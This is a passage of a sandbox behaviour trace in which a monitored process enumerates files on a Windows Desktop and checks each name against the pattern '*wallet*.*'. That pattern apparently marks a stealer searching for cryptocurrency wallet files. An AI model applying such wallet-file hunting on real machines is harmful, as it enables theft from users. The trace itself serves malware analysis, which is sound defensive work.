lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\QqfcEGsF2dGoVC.mp4", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0110.821] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x32) returned 0x38ea2d8 [0110.821] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\QqfcEGsF2dGoVC.mp4", cchWideChar=50, lpMultiByteStr=0x38ea2d8, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\QqfcEGsF2dGoVC.mp4", lpUsedDefaultChar=0x0) returned 50 [0110.821] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2e88 [0110.821] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38ea2d8 | out: hHeap=0x29a0000) returned 1 [0110.821] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.821] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0110.821] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x16) returned 0x3970e60 [0110.821] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x3970e60, cchWideChar=11 | out: lpWideCharStr="*wallet*.*") returned 11 [0110.821] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39704e8 [0110.821] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970e60 | out: hHeap=0x29a0000) returned 1 [0110.821] PathMatchSpecW (pszFile="QqfcEGsF2dGoVC.mp4", pszSpec="*wallet*.*") returned 0 [0110.821] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39704e8 | out: hHeap=0x29a0000) returned 1 [0110.821] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2e88 | out: hHeap=0x29a0000) returned 1 [0110.821] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7bf0caa0, ftCreationTime.dwHighDateTime=0x1d7af0e, ftLastAccessTime.dwLowDateTime=0xada19040, ftLastAccessTime.dwHighDateTime=0x1d7af75, ftLastWriteTime.dwLowDateTime=0xada19040, ftLastWriteTime.dwHighDateTime=0x1d7af75, nFileSizeHigh=0x0, nFileSizeLow=0x1311b, dwReserved0=0x0, dwReserved1=0x0, cFileName="SSkrbDuTIF.m4a", cAlternateFileName="SSKRBD~1.M4A")) returned 1 [0110.821] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.821] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.821] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="SSkrbDuTIF.m4a" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\SSkrbDuTIF.m4a") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\SSkrbDuTIF.m4a" [0110.822] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.822] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.822] lstrcatW (in: lpString1="\\", lpString2="SSkrbDuTIF.m4a" | out: lpString1="\\SSkrbDuTIF.m4a") returned="\\SSkrbDuTIF.m4a" [0110.822] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x60) returned 0x29a04a0 [0110.822] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\SSkrbDuTIF.m4a", cchWideChar=46, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0110.822] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2e) returned 0x39700d0 [0110.822] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\SSkrbDuTIF.m4a", cchWideChar=46, lpMultiByteStr=0x39700d0, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\SSkrbDuTIF.m4a", lpUsedDefaultChar=0x0) returned 46 [0110.822] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a0508 [0110.822] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.822] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.822] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0110.822] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x16) returned 0x3970f00 [0110.822] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x3970f00, cchWideChar=11 | out: lpWideCharStr="*wallet*.*") returned 11 [0110.822] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970448 [0110.822] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970f00 | out: hHeap=0x29a0000) returned 1 [0110.822] PathMatchSpecW (pszFile="SSkrbDuTIF.m4a", pszSpec="*wallet*.*") returned 0 [0110.822] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970448 | out: hHeap=0x29a0000) returned 1 [0110.822] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0508 | out: hHeap=0x29a0000) returned 1 [0110.822] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x285d0430, ftCreationTime.dwHighDateTime=0x1d7aa27, ftLastAccessTime.dwLowDateTime=0xcfb35a10, ftLastAccessTime.dwHighDateTime=0x1d7ad22, ftLastWriteTime.dwLowDateTime=0xcfb35a10, ftLastWriteTime.dwHighDateTime=0x1d7ad22, nFileSizeHigh=0x0, nFileSizeLow=0xc05d, dwReserved0=0x0, dwReserved1=0x0, cFileName="StgqeHlfrw0.m4a", cAlternateFileName="STGQEH~1.M4A")) returned 1 [0110.822] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.822] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.822] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="StgqeHlfrw0.m4a" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\StgqeHlfrw0.m4a") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\StgqeHlfrw0.m4a" [0110.822] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.822] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.822] lstrcatW (in: lpString1="\\", lpString2="StgqeHlfrw0.m4a" | out: lpString1="\\StgqeHlfrw0.m4a") returned="\\StgqeHlfrw0.m4a" [0110.822] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x60) returned 0x29a04a0 [0110.822] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\StgqeHlfrw0.m4a", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0110.822] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2f) returned 0x39700d0 [0110.822] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\StgqeHlfrw0.m4a", cchWideChar=47, lpMultiByteStr=0x39700d0, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\StgqeHlfrw0.m4a", lpUsedDefaultChar=0x0) returned 47 [0110.823] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a0508 [0110.823] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.823] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.823] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0110.823] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x16) returned 0x3970dc0 [0110.823] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x3970dc0, cchWideChar=11 | out: lpWideCharStr="*wallet*.*") returned 11 [0110.823] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970420 [0110.823] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970dc0 | out: hHeap=0x29a0000) returned 1 [0110.823] PathMatchSpecW (pszFile="StgqeHlfrw0.m4a", pszSpec="*wallet*.*") returned 0 [0110.823] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970420 | out: hHeap=0x29a0000) returned 1 [0110.823] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0508 | out: hHeap=0x29a0000) returned 1 [0110.823] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5cc60f70, ftCreationTime.dwHighDateTime=0x1d7a02f, ftLastAccessTime.dwLowDateTime=0xa9de71c0, ftLastAccessTime.dwHighDateTime=0x1d7a585, ftLastWriteTime.dwLowDateTime=0xa9de71c0, ftLastWriteTime.dwHighDateTime=0x1d7a585, nFileSizeHigh=0x0, nFileSizeLow=0x1280, dwReserved0=0x0, dwReserved1=0x0, cFileName="SWeD.odt", cAlternateFileName="")) returned 1 [0110.823] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.823] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.823] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="SWeD.odt" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\SWeD.odt") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\SWeD.odt" [0110.823] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.823] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.823] lstrcatW (in: lpString1="\\", lpString2="SWeD.odt" | out: lpString1="\\SWeD.odt") returned="\\SWeD.odt" [0110.823] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x50) returned 0x38ead10 [0110.823] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\SWeD.odt", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0110.823] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x28) returned 0x29a32e8 [0110.823] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\SWeD.odt", cchWideChar=40, lpMultiByteStr=0x29a32e8, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\SWeD.odt", lpUsedDefaultChar=0x0) returned 40 [0110.823] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x39700d0 [0110.823] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a32e8 | out: hHeap=0x29a0000) returned 1 [0110.824] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38ead10 | out: hHeap=0x29a0000) returned 1 [0110.824] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0110.824] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x16) returned 0x3970d00 [0110.824] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x3970d00, cchWideChar=11 | out: lpWideCharStr="*wallet*.*") returned 11 [0110.824] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39704c0 [0110.824] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970d00 | out: hHeap=0x29a0000) returned 1 [0110.824] PathMatchSpecW (pszFile="SWeD.odt", pszSpec="*wallet*.*") returned 0 [0110.824] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39704c0 | out: hHeap=0x29a0000) returned 1 [0110.824] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.824] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a932a00, ftCreationTime.dwHighDateTime=0x1d7a7f6, ftLastAccessTime.dwLowDateTime=0x6167a550, ftLastAccessTime.dwHighDateTime=0x1d7ae78, ftLastWriteTime.dwLowDateTime=0x6167a550, ftLastWriteTime.dwHighDateTime=0x1d7ae78, nFileSizeHigh=0x0, nFileSizeLow=0x9172, dwReserved0=0x0, dwReserved1=0x0, cFileName="UQk58h 9TQk7yvi7D.mkv", cAlternateFileName="UQK58H~1.MKV")) returned 1 [0110.824] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.824] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.824] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="UQk58h 9TQk7yvi7D.mkv" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\UQk58h 9TQk7yvi7D.mkv") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\UQk58h 9TQk7yvi7D.mkv" [0110.824] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.824] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.824] lstrcatW (in: lpString1="\\", lpString2="UQk58h 9TQk7yvi7D.mkv" | out: lpString1="\\UQk58h 9TQk7yvi7D.mkv") returned="\\UQk58h 9TQk7yvi7D.mkv" [0110.824] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x70) returned 0x29a04a0 [0110.824] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\UQk58h 9TQk7yvi7D.mkv", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0110.824] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x35) returned 0x38ea758 [0110.824] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\UQk58h 9TQk7yvi7D.mkv", cchWideChar=53, lpMultiByteStr=0x38ea758, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\UQk58h 9TQk7yvi7D.mkv", lpUsedDefaultChar=0x0) returned 53 [0110.824] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2c00 [0110.824] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38ea758 | out: hHeap=0x29a0000) returned 1 [0110.824] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.824] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0110.824] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x16) returned 0x3970ea0 [0110.824] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x3970ea0, cchWideChar=11 | out: lpWideCharStr="*wallet*.*") returned 11 [0110.824] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970358 [0110.824] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970ea0 | out: hHeap=0x29a0000) returned 1 [0110.824] PathMatchSpecW (pszFile="UQk58h 9TQk7yvi7D.mkv", pszSpec="*wallet*.*") returned 0 [0110.825] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970358 | out: hHeap=0x29a0000) returned 1 [0110.825] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2c00 | out: hHeap=0x29a0000) returned 1 [0110.825] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd8827190, ftCreationTime.dwHighDateTime=0x1d7aa97, ftLastAccessTime.dwLowDateTime=0x8be18a00, ftLastAccessTime.dwHighDateTime=0x1d7ac64, ftLastWriteTime.dwLowDateTime=0x8be18a00, ftLastWriteTime.dwHighDateTime=0x1d7ac64, nFileSizeHigh=0x0, nFileSizeLow=0xefc6, dwReserved0=0x0, dwReserved1=0x0, cFileName="VAHC8zDa9SevTeoKicIh.docx", cAlternateFileName="VAHC8Z~1.DOC")) returned 1 [0110.825] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.825] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.825] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="VAHC8zDa9SevTeoKicIh.docx" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\VAHC8zDa9SevTeoKicIh.docx") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\VAHC8zDa9SevTeoKicIh.docx" [0110.825] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.825] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.825] lstrcatW (in: lpString1="\\", lpString2="VAHC8zDa9SevTeoKicIh.docx" | out: lpString1="\\VAHC8zDa9SevTeoKicIh.docx") returned="\\VAHC8zDa9SevTeoKicIh.docx" [0110.825] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x29a04a0 [0110.825] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\VAHC8zDa9SevTeoKicIh.docx", cchWideChar=57, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 57 [0110.825] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x39) returned 0x29a2d68 [0110.825] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\VAHC8zDa9SevTeoKicIh.docx", cchWideChar=57, lpMultiByteStr=0x29a2d68, cbMultiByte=57, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\VAHC8zDa9SevTeoKicIh.docx", lpUsedDefaultChar=0x0) returned 57 [0110.825] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2c48 [0110.825] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2d68 | out: hHeap=0x29a0000) returned 1 [0110.825] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.825] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0110.825] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x16) returned 0x3970c40 [0110.825] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x3970c40, cchWideChar=11 | out: lpWideCharStr="*wallet*.*") returned 11 [0110.825] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970588 [0110.825] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970c40 | out: hHeap=0x29a0000) returned 1 [0110.825] PathMatchSpecW (pszFile="VAHC8zDa9SevTeoKicIh.docx", pszSpec="*wallet*.*") returned 0 [0110.825] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970588 | out: hHeap=0x29a0000) returned 1 [0110.825] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2c48 | out: hHeap=0x29a0000) returned 1 [0110.825] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfeb7dc60, ftCreationTime.dwHighDateTime=0x1d7aa10, ftLastAccessTime.dwLowDateTime=0xa18851b0, ftLastAccessTime.dwHighDateTime=0x1d7ac6c, ftLastWriteTime.dwLowDateTime=0xa18851b0, ftLastWriteTime.dwHighDateTime=0x1d7ac6c, nFileSizeHigh=0x0, nFileSizeLow=0x10367, dwReserved0=0x0, dwReserved1=0x0, cFileName="VbI-8gh.mkv", cAlternateFileName="")) returned 1 [0110.825] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.825] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.825] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="VbI-8gh.mkv" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\VbI-8gh.mkv") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\VbI-8gh.mkv" [0110.826] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.826] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.826] lstrcatW (in: lpString1="\\", lpString2="VbI-8gh.mkv" | out: lpString1="\\VbI-8gh.mkv") returned="\\VbI-8gh.mkv" [0110.826] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x60) returned 0x29a04a0 [0110.826] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\VbI-8gh.mkv", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0110.826] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2b) returned 0x39700d0 [0110.826] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\VbI-8gh.mkv", cchWideChar=43, lpMultiByteStr=0x39700d0, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\VbI-8gh.mkv", lpUsedDefaultChar=0x0) returned 43 [0110.826] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a0508 [0110.826] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.826] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.826] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0110.826] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x16) returned 0x3970ec0 [0110.826] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x3970ec0, cchWideChar=11 | out: lpWideCharStr="*wallet*.*") returned 11 [0110.826] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970560 [0110.826] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970ec0 | out: hHeap=0x29a0000) returned 1 [0110.826] PathMatchSpecW (pszFile="VbI-8gh.mkv", pszSpec="*wallet*.*") returned 0 [0110.826] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970560 | out: hHeap=0x29a0000) returned 1 [0110.826] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0508 | out: hHeap=0x29a0000) returned 1 [0110.826] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19cbe0 | out: 